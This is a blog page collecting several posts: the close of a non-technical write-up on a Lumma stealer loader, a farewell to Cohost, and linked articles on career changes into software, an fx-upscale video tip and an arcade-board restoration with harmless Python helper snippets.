So now we know that the large byte arrays at the top of the code are an "encrypted" exe that this loader puts into memory, marks as executable, and then executes. Marvelous. Sadly, this is where I hit a wall, as my skills at reverse engineering applications are very limited. The final stage of the attack is a Windows exe, but not one made with .NET, and I don't really know what I'm looking at in the output from Ghidra. Thankfully, however, actual professionals have already done the work for me! Naturally, I put both the first and second binaries into VirusTotal and found that they were already flagged by a number of AVs. A common pattern in the naming was "LUMMASTEALER", which gives us our hint as to what this malware is. Lumma is one of many malware operations (read: gangs) that offer a "malware as a service" product. Their so-called "stealer" code searches through your system for cryptocurrency wallets, stored credentials, and other sensitive data. This data is then sent to their command-and-control (C2) servers, where the gang can move on to either stealing money from you or profiting from selling your data online. Lumma's malware tends not to encrypt victims' devices the way traditional ransomware operations do. For more information I recommend this excellent write-up from Cyfirma.

If you made it this far, thanks for reading! I had a lot of fun looking into the details of this attack, ranging from the weakness in GitHub's notification emails to the multiple layers of the attack. Some of the tools I used to help me do this analysis were:

- Windows Sandbox
- Ghidra
- dotPeek
- HxD
- Visual Studio

Updates: Previously I said that the codesigning certificate was stolen from Spotify; however, after discussing my findings with DigiCert we agreed that this is not the case and rather that the signature is being spoofed.

Mourning the Loss of Cohost

The staff running Cohost have announced (archived) that at the end of 2024 Cohost will be shutting down, with the site going read-only on October 1st 2024. This news was deeply upsetting to receive, as Cohost filled a space left by other social media websites when they stopped being fun and became nothing but tools of corporations. Looking Back I joined Cohost in October of 2022 when it was still unclear if elon musk would go through with his disastrous plan to buy twitter. The moment that deal was confirmed, I abandoned my Twitter account and switched to using Cohost only for a time and never looked back once. I signed up for Cohost Plus! a week later after seeing the potential for what Cohost could become, and what it could mean for a less commercial future. I believed in Cohost. I believed that I could be witness to the birth of a better web, not built on advertising, corporate greed, privacy invasion - but instead on a focus of people, the content they share, and the communities they build. The loss of Cohost is greater than just the loss of the community of friends I've made, it's the dark cloud that has now formed over people who shared their vision, the rise of the question of "why bother". When I look back to my time on twitter, I'm faced with mixed feelings. I dearly miss the community that I had built there - some of us scattered to various places, while others decided to take their leave entirely from social media. I am sad knowing that, despite my best efforts of trying to maintain the connections I've made, I will lose touch with my friends because there is no replacement for Cohost. Although I miss my friends from twitter, I've come to now realize how awful twitter was for me and my well-being. It's funny to me that back when I was using twitter, I and seemingly everybody else knew that twitter was a bad place, and yet we all continued to use it. Even now, well into its nazi bar era, people continue to use it. Cohost showed what a social media site could be if the focus was not on engagement, but on the community. The lack of hard statistics like follower or like count meant that Cohost could never be a popularity contest - and that is something that seemingly no other social media site has come to grips with. The Alternatives Many people are moving, or have already moved, to services like Mastodon and Bluesky. While I am on Mastodon, these services have severe flaws that make them awful as a replacement for Cohost. Mastodon is a difficult to understand web of protocols, services, terminology, and dogma. It suffers from critical "open source brain worm" where libertarian ideals take priority over important safety and usability aspects, and I do not see any viable way to resolve these issues. Imagine trying to convince somebody who isn't technical to "join mastodon". How are they ever going to understand the concept of decentralization, or what an instance is, or who runs the instance, or what client to use, or even what "fediverse" means? This insurmountable barrier ensures that only specific people are taking part in the community, and excludes so many others. Bluesky is the worst of both worlds of being both technically decentralized while also very corporate. It's a desperate attempt to clone twitter as much as possible without stopping for even a moment to evaluate if that includes copying some of twitter's worst mistakes. Looking Forward When it became clear that I was going to walk away from my twitter account there was fear and anxiety. 
I knew that I would lose connections, some of which I had to work hard to build, but I had to stick to my morals. In the end, things turned out alright. I found a tight-knit community of friends in a private Discord server, found more time to focus on my hobbies and less on doomscrolling, and established this very blog. I know that even though I am very sad and very angry about Cohost, things will turn out alright. So long, Cohost, and thank you, Jae, Colin, Aiden, and Kara for trying. You are all an inspiration to not just desire a better world, but to go out and make an effort to build it. I'll miss you, eggbug.


More in technology

From building ships to shipping builds: how to succeed in making a career switch to software development

I have worked with a few software developers who made the switch to this industry in the middle of their careers. A major change like that can be scary and raise a lot of fears and doubts, but I can attest that this can work out well with the right personality traits and a supporting environment. Here’s what I’ve observed. To keep the writing concise, I’ll be using the phrase “senior junior”1 to describe those that have made such a career switch.

Overcoming the fear

Fear is a natural reaction to any major change in life, especially when there’s a risk of taking a financial hit while you have a family to support and a home loan to pay. The best mitigation that I’ve heard of is believing that you can make the change, successfully. It sounds like an oversimplification, sure, as all it does is remove a mental blocker and throw out the self-doubt. And yet it works unreasonably well. It also helps if you have at least some savings to mitigate the financial risk. A year’s worth of expenses saved up can go a long way in providing a solid safety net.

What makes them succeed

A great software developer is not someone who simply slings some code over the wall and spends all of their day working only on the technical stuff; there are quite a few critical skills that one needs to succeed. This is not an exhaustive list, but I’ve personally observed that the following ones are the most critical:

- ability to work in a team
- great communication skills
- conflict resolution
- ability to make decisions in the context of product development and business goals
- maintaining an environment of psychological safety

Those with more than a decade of experience in another role or industry will most likely have a lot of these skills covered already, and they can bring that skill set into a software development team while working with the team to build their technical skill set. Software development is not special; at the end of the day, you’re still interacting with humans and everything that comes with that, good or bad. After working with juniors that are fresh out of school and “senior juniors” who have more career experience than I do, I have concluded that the ones that end up being great software developers have one thing in common: the passion and drive to learn everything about the role and the work we do. One highlight that I often like to share in discussions is a software developer who used to work in manufacturing. At some point they got interested in learning how they could use software to make work more efficient. They started with an MVP solution involving a big TV and Google Sheets, then they started learning about web development for a solution in a different area of the business, and ended up building a basic inventory system for the warehouse. After 2-3 years of self-learning outside of work hours and deploying to production in the most literal sense, they ended up joining my team. They got up to speed very quickly and ended up being a very valuable contributor to the team. In another example, I have worked with someone who previously held a position as a technical draftsman and 3D designer in a ship building factory (professionals call it a shipyard), but after some twists and turns ended up at a course for those interested in making a career switch, which led to them eventually working in the same company I do. Now they ship builds with confidence while making sure that the critical system we are working on stays stable. That developer also kicks my ass in foosball about 99% of the time.
The domain knowledge advantage

The combination of industry experience and software development skills is an incredibly powerful one. When a software developer starts work on a project, they learn the business domain piece by piece, eventually reaching a state where they have a slight idea of how the business operates, but never the full picture. Speaking with their end users helps them come a long way, but there are always some details that get lost in that process. Someone coming from the industry will have in-depth knowledge about the business: how it operates, where the money comes from, what the main pain points are, and where the opportunities for automation lie. They will know what problems need solving, and have the basic technical know-how for how to try solving them. Like a product owner, but on steroids. Software developers often fall into the trap of creating a startup to scratch that itch they have for building new things, or trying out technologies that have been on their to-do list for a very long time. The technical problems are fun to solve, sure, but the focus should be on the actual problem that needs fixing. If I wanted to start a new startup with someone, I’d look for someone working in an industry that I’m interested in and who understands the software development basics. Or maybe I’m just looking for an excellent product owner.

How to help them succeed

If you have a “senior junior” software developer on your team, then there really isn’t anything special you’d need to do compared to any other new joiner. Do your best to foster a culture of psychological safety, have regular 1-1s with them, and make sure to pair them up with more experienced team members as often as possible. A little bit of encouragement in challenging environments or periods of self-doubt can also go a long way. Temporary setbacks are temporary, after all.

What about “AI”?

Don’t worry about all that “AI”2 hype; if it were as successful in replacing all software development jobs as a lot of people like to shout from the rooftops, then it would have already done so. At best, it’s a slight productivity boost3 at the cost of a huge negative impact on the environment.

Closing thoughts

If you’re someone who has thought about working as a software developer, or who is simply excited about all the ways that software can be used to solve actual business problems and build something from nothing, then I definitely recommend giving it a go, assuming that you have the safety net and risk appetite to do so. For reference, my journey towards software development looked like this, plus a few stints of working as a newspaper seller or a grocery store worker.

1. who do you call a “senior senior” developer, a senile developer? ↩︎
2. spicy autocomplete engines (also known as LLM-s) do not count as actual artificial intelligence. ↩︎
3. what fascinates me about all the arguments around “AI” (LLM-s) is the feeling of being more productive. But how do you actually measure developer productivity, and do you account for possible reduced velocity later on when you’ve mistaken code generation speed for velocity and introduced hard-to-catch bugs into the code base that need to be resolved when they inevitably become an issue? ↩︎

This unique electronic toy helps children learn their shapes

It isn’t a secret that many kids find math to be boring and it is easy for them to develop an attitude of “when am I ever going to use this?” But math is incredibly useful in the real world, from blue-collar machinists using trigonometry to quantum physicists unveiling the secrets of our universe through […]

A slept on upscaling tool for macOS

I upload YouTube videos from time to time, and a fun comment I often get is “Whoa, this is in 8K!”. Even better, I’ve had comments from the like, seven people with 8K TVs that the video looks awesome on their TV. And you guessed it, I don’t record my videos in 8K! I record them in 4K and upscale them to 8K after the fact. There’s no shortage of AI video upscaling tools today, but they’re of varying quality, and some are great but quite expensive. The legendary Finn Voorhees created a really cool tool though, called fx-upscale, that smartly leverages Apple’s built-in MetalFX framework. For the unfamiliar, this library is an extension of Apple’s Metal graphics library, and adds functionality similar to NVIDIA’s DLSS, where it intelligently upscales video using machine learning (AI): rather than just stretching an image, it uses a model to try to infer what the frame would look like at a higher resolution. It’s primarily geared toward video game use, but Finn’s library shows it does an excellent job for video too. I think this is a really killer utility, and use it for all my videos. I even have a license for Topaz Video AI, which arguably works better, but takes an order of magnitude longer. For instance my recent 38 minute, 4K video took about an hour to render to 8K via fx-upscale on my M1 Pro MacBook Pro, but would take over 24 hours with Topaz Video AI.

```
# Install with homebrew
brew install finnvoor/tools/fx-upscale

# Outputs a file named my-video Upscaled.mov
fx-upscale my-video.mov --width 7680 --codec h265
```

Anyway, just wanted to give a tip toward a really cool tool! Finn’s even got a version in the Mac App Store called Unsqueeze (https://apps.apple.com/ca/app/unsqueeze/id6475134617) with an actual GUI that’s even easier to use, but I really like the command line version because you get a bit more control over the output. 8K is kinda overkill for most use cases, so to be clear you can go from like, 1080p to 4K as well if you’re so inclined. I just really like 8K for the future proofing of it all; in however many years, when 8K TVs are more common, I’ll be able to have some of my videos already able to take advantage of that. And it takes long enough to upscale that I’d be surprised to see TVs or YouTube offering that upscaling natively in a way that looks as good given the amount of compute required currently.

(Obviously very zoomed in to show the difference more easily.)

If you ask me, for indie creators, even when 8K displays are more common, the future of recording still probably won’t be in native 8K. 4K recording still gives more than enough detail to allow AI to do a compelling upscale to 8K. I think for my next camera I’m going to aim for recording in 6K (so I can still reframe in post), and then continue to output the final result in 4K to be AI upscaled. I’m coming for you, Lumix S1ii.

Computer Games mag Interviews Don Bluth (1984)

Talks about the famous Dragon's Lair

Refurb weekend: Gremlin Blasto arcade board

totally unreasonable price for a completely untested item, as-was, no returns, with no power supply, no wiring harness and no auxiliary daughterboards. At the end of this article, we'll have it fully playable and wired up to a standard ATX power supply, a composite monitor and off-the-shelf Atari joysticks, and because this board was used for other related games from that era, the process should work with only minor changes on other contemporary Gremlin arcade classics like Blockade, Hustle and Comotion [sic]. It's time for a Refurb Weekend. a July 1982 San Diego Reader article, the locally famous alternative paper I always snitched a copy of when I was downtown, and of which I found a marginally better copy to make these scans. There's also an exceptional multipart history of Gremlin you can read but for now we'll just hit the highlights as they pertain to today's project. ported to V1 Unix and has a simpler three-digit variant Bagels which was even ported to the KIM-1. Unfortunately his friends didn't have minicomputers of their own, so Hauck painstakingly put together a complete re-creation from discrete logic so they could play too, later licensed to Milton Bradley as their COMP IV handheld. Hauck had also been experimenting with processor-controlled video games, developing a simple homebrew unit based around the then-new Intel 8080 CPU that could connect to his television set and play blackjack. Fogleman met Hauck by chance at a component vendor's office and hired him on to enhance the wall game line, but Hauck persisted in his experiments, and additionally presented Fogleman with a new and different machine: a two-player game played with buttons on a video TV display, where each player left a boxy solid trail in an attempt to crowd out the other. To run the fast action on its relatively slow ~2MHz CPU and small amount of RAM, a character generator circuit made from logic chips painted a 256x224 display from 32 8x8 tiles in ROM specified by a 32x28 screen matrix, allowing for more sophisticated shapes and relieving the processor of having to draw the screen itself. (Does this sound like an early 8-bit computer? Hold that thought.) patent application was too late and too slow to stop the ripoffs. (For the record, Atari programmer Dennis Koble was adamant he didn't steal the idea from Gremlin, saying he had seen similar "snake" games on CompuServe and ARPANET, but Nolan Bushnell nevertheless later offered Gremlin $100,000 in "consolation" which the company refused.) Meanwhile, Blockade orders evaporated and Gremlin's attempts to ramp up production couldn't save it, leaving the company with thousands of unused circuit boards, game cabinets and video monitors. While lawsuits against the copycats slowly lumbered forward, Hauck decided to reprogram the existing Blockade hardware to play new games, starting with converting the Comotion board into Hustle in 1977 where players could also nab targets for additional points. The company ensured they had a thousand units ready to ship before even announcing it and sales were enough to recoup at least some of the lost investment. Hauck subsequently created a reworked version of the board with the same CPU for the more advanced game Depthcharge, initially testing poorly with players until the controls were simplified. This game was licensed to Taito as Sub Hunter and the board reworked again for the target shooter Safari, also in 1977, and also licensed by Taito. For 1978, Gremlin made one last release using the Hustle-Comotion board. 
This game was Blasto. A single player scores by blasting the mines that pack the playfield (the present world record is 8,730), but in two-player mode the players can also shoot each other for an even bigger point award. This means two-player games rapidly turn into active hunts, with a smaller bonus awarded to a player as well if the other gets nailed by a mine.

Gremlin's hardware ambitions didn't stop at arcade games, either: the same basic design grew into the Noval 760, a desk-built personal computer (the thought you were holding earlier) with an interactive on-board assembler. Noval also produced an education-targeted system called the Telemath, based on the 760 hardware, which was briefly deployed in a few San Diego Unified elementary schools. Alas, they were long gone before we arrived. Industry observers were impressed by the specs and baffled by the desk. Although the base price of $2995 [about $16,300] was quite reasonable considering its capabilities, you couldn't buy it without its hulking enclosure, which made it a home computer only to the sort of people who would buy a home PDP-8. (Raises hand.) Later upgrades with a Z80 and a full 32K didn't make it any more attractive to buyers, and Noval sold barely a dozen. Some of the rest remained at Gremlin as development systems (since they practically were already), and an intact upgraded unit with aftermarket floppy drives lives at the Computer History Museum.

The failure of Noval didn't kill Gremlin outright, but Fogleman was concerned the company lacked sufficient capital to compete more strongly in the rapidly expanding video game market, and Noval certainly hadn't provided it. With wall game sales fading fast and cash flow crunched, the company was slowly approaching bankruptcy by the time Blasto hit arcades. At the same time, Sega Enterprises, Inc., then owned by conglomerate Gulf+Western (who also then owned Paramount Pictures), was looking for a quick way to revive its failing North American division, which was only surviving on the strength of its aggressively promoted mall arcades. Sega needed development resources to bring out new games States-side, and Gremlin needed money. In September 1978 Fogleman agreed to make Gremlin a Sega subsidiary in return for an undisclosed number of shares, and became a vice chairman.

Sega was willing to do just about anything to achieve supremacy on this side of the Pacific. In addition to infusing cash into Gremlin to make new games (as Gremlin/Sega) and distribute others from their Japanese peers and partners (as Sega/Gremlin), Sega also perceived a market opportunity in licensing arcade ports to the growing home computer segment. Texas Instruments' 99/4 had just hit the market in 1979 to howls that there was hardly any software, and their close partner Milton Bradley was looking for marketable concepts for cartridge games. Blasto had simple fast action and a good name in the arcades, required only character graphics (well within the 9918 video chip's capabilities) and worked for one or two players, and Sega had no problem blessing a home port of an older property for cheap. Milton Bradley picked up the license to Hustle as well. The port was eventually handed to Bob Harris for completion, and TI house programmer Kevin Kenney wrote some additional features.

Back to the arcade board. Its control connections come in on pin headers with the pins numbered 1 to 40 straight across (obviously some thought was given to using the same PCB as much as possible); the power header is another 10-pin block, and the audio and video headers are 4-pin. Oddly, the manual doesn't say anywhere what the measurements are, so I checked them with calipers and got a pitch of around 0.15", which sounds very much like a common 0.156" header. I ordered a small pack of those as an experiment. Production Blasto boards are marked 814-0002 because of the control changes: if you have an 814-0001, then you have a prototype.
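As an aside, pitch measurements like that are more trustworthy if you span several pins with the calipers and divide by the number of gaps, then compare against the usual suspects. A quick throwaway check in Python, with an invented span value purely for illustration:

# Estimate a header's pin pitch from one caliper span across several pins, then
# compare against common pitches. The span below is a made-up example reading.
common_pitches_in = {"0.100 in (2.54 mm)": 0.100,
                     "0.156 in (3.96 mm)": 0.156,
                     "0.200 in (5.08 mm)": 0.200}
span_in = 1.40                       # hypothetical: center of pin 1 to center of pin 10
gaps = 9                             # ten pins means nine gaps
pitch = span_in / gaps
closest = min(common_pitches_in, key=lambda name: abs(common_pitches_in[name] - pitch))
print(f"measured pitch ~{pitch:.3f} in, closest standard: {closest}")

0.156" works out to 3.96mm, a very common wire-to-board pitch, so ordinary off-the-shelf connectors are a reasonable bet.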
(The MAME driver also makes reference to an Amutech Mine Sweeper, which is a direct and compatible ripoff of this board — despite the game type, it's not based on Depthcharge.) The ROM set is listed with the part numbers for the cocktail version, but the ROM contents expected in the hashes actually correspond to the upright.

Bipolar ROMs and PROMs are, as the name suggests, built with NPN bipolar junction transistors instead of today's far more common MOSFETs ("MOS transistors"). This makes them lower density but also faster: these particular bipolar PROMs have access times of 55-60ns, as opposed to EPROMs or flash ROMs of similar capacity which may be multiple times slower depending on the chip and process. For many applications this doesn't matter much, but in some tightly-timed systems the speed difference can make it difficult to replace bipolar PROMs with more convenient EPROMs, and most modern-day chip programmers can't generate the higher voltage needed to program them (you're basically blowing a whole bunch of microscopic Nichrome metal fuses). Although modern CMOS PROMs are available at comparable speeds, bipolars were once very common, including in military environments where they could be manufactured to tolerate unusually harsh operating conditions. The incomparable Ken Shirriff has a die photo and article on the MMI 5300, an open-collector chip which is one of the military-spec parts from this line.

The CPU is a TI-manufactured 8080A (amusingly, some of TI's own terminals, like the Model 745 KSR and the bubble-memory Model 763 ASR, use AMD 8080s!). The Intel 8080A is a refined version of the original Intel 8080 that works properly with more standard TTL devices (the original could only handle low-power TTL); the "NL" tag is TI's designation for a plastic regular-duty DIP. Its clock source is a 20.79MHz crystal at Y1 which is divided down by ten to yield the nominal clock rate of 2.079MHz, slightly above its maximum rating of 2MHz but stable enough at that speed. The later Intel 8080A-1 could be clocked up to 3.125MHz, and of course the successor Intel 8085 and Zilog Z80 processors could run faster still. An interesting absence on this board is an Intel 8224 or equivalent to generate the 8080A's two-phase clock: that's done directly off the crystal oscillator with discrete logic, an elegant (and likely cheaper) design by Hauck. The video output also uses the same crystal.

Next to the CPU are pads for the RAM chips. You saw six of them in the last picture under the second character ROM (316-0100M), all 2102 (1Kbit) static RAM. These were the chips I was most expecting to fail, having seen bad SRAM in other systems like my KIM-1. The ones here are 450ns Fairchild 21021 SRAMs in the 21021PC plastic case and "commercial" temperature range, and six of them add up to 768 bytes of memory. NOS examples and equivalents are fortunately not difficult to find. Closer to the CPU in this picture, however, are two more RAM chip pads that are empty except for tiny factory-installed jumpers. On both the Hustle and Blasto boards they remain otherwise unpopulated, and there is an additional jumper between E4 and E5, also visible in the last picture. The Comotion board, however, has an additional 256 bytes of RAM here (as two more 1024x1 SRAMs): on that board these pads have RAM, there are no jumpers on the pads, and the jumper is instead between E3 (ground) and E5. This jumper is also on Blockade, even though it has only five 2102s and three dummy jumpers on the other pads. That said, the games don't seem to care how much RAM is present as long as the minimum is there: the current MAME driver gives all of them the full 1K.
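Such a small amount of RAM works precisely because of that character-generator trick from earlier: the program only has to maintain a 32x28 matrix of tile numbers, and the logic paints the 256x224 picture from the 8x8 patterns in the character ROM. Here's a tiny software model of the idea; the tile patterns and names are made up for illustration, not taken from the actual 316-series ROMs.

# Toy model of the Blockade-family video scheme: the CPU maintains only a 32x28
# matrix of tile numbers, and a character generator expands 8x8 patterns from ROM.
# The tile patterns below are invented placeholders, not real ROM contents.
TILE_W, TILE_H = 8, 8
COLS, ROWS = 32, 28                               # 32*8 = 256 wide, 28*8 = 224 tall

tile_rom = [[0x00] * TILE_H for _ in range(32)]   # 32 tiles, one byte per pixel row
tile_rom[1] = [0xFF] * TILE_H                     # tile 1: a solid 8x8 block

screen = [[0] * COLS for _ in range(ROWS)]        # the screen matrix the CPU writes
screen[10][5] = 1                                 # drop a solid block at column 5, row 10

def render(screen, tile_rom):
    # Expand the tile matrix into a 256x224 grid of 0/1 pixels.
    fb = [[0] * (COLS * TILE_W) for _ in range(ROWS * TILE_H)]
    for ty, row in enumerate(screen):
        for tx, tile in enumerate(row):
            for y in range(TILE_H):
                bits = tile_rom[tile][y]
                for x in range(TILE_W):
                    fb[ty * TILE_H + y][tx * TILE_W + x] = (bits >> (7 - x)) & 1
    return fb

frame = render(screen, tile_rom)
print(len(frame[0]), "x", len(frame))             # 256 x 224

Even the full matrix is under a kilobyte, a small fraction of what a true bitmap at the same resolution would need, which is why a handful of 2102s goes such a long way here.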
The power requirements are simple: the board wants +5V, +12V and -12V (the 8080's own -5V is handled on board; this 8080 system uses a regulator). Tracing the schematic out further, the -12V line is also used with the +5V and +12V lines to run the video circuit. These are all part of the 10-pin power header. And what provides almost this exact sequence of voltages? An AT power supply connector! If we're clever about how we put the two halves on, we can get nearly the right lines in the right places. The six-pin AT P9 connector reversed is +5V, +5V, +5V, -5V, ground, ground, so we can cut the -5V to be the key. The six-pin AT P8 connector not reversed is power-good, +5V (or NC), +12V, -12V, ground, ground, so we cut the +5V to be the key, and cut the power-good line and one of the dangling grounds and wire ground to the power-good pin. (I'll recap this mapping in a quick sketch a little further down.) Fortunately I had a couple of spare AT-to-ATX converter cables from when we redid the AT power supply on the Alpha Micro Eagle 300, and I had no qualms about cutting up their connectors since we're going to modify them anyway. A quick couple of drops of light-cured cyanoacrylate into the key hole ... and something's alive! An LED glows! Time now for the video connector to see if we can get a picture.

Getting the game going at power-on is another matter (think of what goes into a nice 6502 reset circuit). The board does have its own reset circuit, of a sort. You'll notice here that the coin start is wired to the same line, and the manual even makes reference to this ("The circuitry in this game has been arranged so that the insertion of a quarter through the coin mechanism will reset the restart [sic] in the system. This clears up temporary problems caused by power line disturbances, static, etc."). We'll of course be dealing with the coin mechanism a little later, but that doesn't solve the problem of bringing the machine into the attract mode when powered on. I also have doubts that people would have blithely put coins into a machine that was obviously on the fritz.

As for the controls, the pinout tells you which pair is up and down, or left and right, but not which one is exactly which, because that depends on the joystick construction. We'll come back to this.

Gremlin itself was eventually renamed Sega Electronics, Inc. (under Sega Enterprises) to emphasize the brand name more strongly. The company entered a rapid decline with the video game crash of 1983 and the manufacturing assets were sold to Bally Midway along with certain publishing rights, but the original Gremlin IP and game development teams stayed with Sega Electronics and remained part of Gulf+Western until they were disbanded. The brand is still retained as part of CBS Media Ventures today, though modern Paramount Global doesn't currently use the label for its original purpose. In 1987 the old wall game line was briefly reincarnated under license by a new company, also called Gremlin Industries and staffed by some former Gremlin employees, but it only released a small number of new machines before folding. Meanwhile, Sega Enterprises separated from Gulf+Western in a 1984 management buyout by original founder David Rosen, Japanese executive Hayao Nakayama and their backers. This Sega is what people consider Sega today, now part of Sega Sammy Holdings, and the rights to the original Gremlin games — including Blasto — are under it.

Lane Hauck's last recorded game at Gremlin/Sega was the classic Carnival in 1980 (I played this first on the Intellivision). After leaving the company, he held positions at various companies including San Diego-based projector manufacturer Proxima (notoriously later merging with InFocus), Cypress Semiconductor and its AgigA Tech subsidiary (both now part of Infineon), and Maxim Integrated Products (now part of Analog Devices), and he works as a consultant today.
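As promised, here's the quick recap of the AT connector surgery, written out as a throwaway script so I can't mis-remember it later. The AT P8/P9 pinouts are the standard published ones; the helper name and output format are just mine, and exactly where each line lands on the board's 10-pin header depends on how you seat the modified halves, so treat this as a checklist rather than gospel.

# Standard AT supply connectors as used above: P9 goes on reversed, P8 as-is.
p9_reversed = ["+5V", "+5V", "+5V", "-5V", "GND", "GND"]
p8_forward  = ["PG", "+5V", "+12V", "-12V", "GND", "GND"]

def modify(pins, cut, rewire=None):
    # Positions in 'cut' lose their pin (they become keys); 'rewire' swaps in a new line.
    rewire = rewire or {}
    return ["KEY" if i in cut else rewire.get(i, p) for i, p in enumerate(pins)]

# Cut -5V on the reversed P9 as its key; on P8 cut the +5V as its key, then cut
# power-good and feed that position ground from one of the dangling ground wires.
half_a = modify(p9_reversed, cut={3})
half_b = modify(p8_forward, cut={1}, rewire={0: "GND (from spare ground)"})
print(half_a)   # ['+5V', '+5V', '+5V', 'KEY', 'GND', 'GND']
print(half_b)   # ['GND (from spare ground)', 'KEY', '+12V', '-12V', 'GND', 'GND']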
I'm not done with Blasto. While I still enjoy playing the TI-99/4A port, there are improvements to be made, particularly the fact that it's single-fire, and it was never ported to anything else. I have ideas: I've been working on it off and on for a year or so and all the main gameplay code is written, so I just have to finish the graphics and music. You'll get to play it. And the arcade board? Well, we have a working game and a working harness that I can build off. I need a better sound amplifier, the "boom" circuit deserves a proper subwoofer, and I should fake up a little circuit using the power-good line from the ATX power supply to substitute for the power interrupt board. Most of all, though, we really need to get it a proper display and cabinet. That's naturally going to need a budget rather larger than my typical projects, and I'm already saving up for it. Suggestions for a nice upright cab with display, buttons and joysticks that I can rewire — and afford! — are solicited. On both those counts, to be continued.
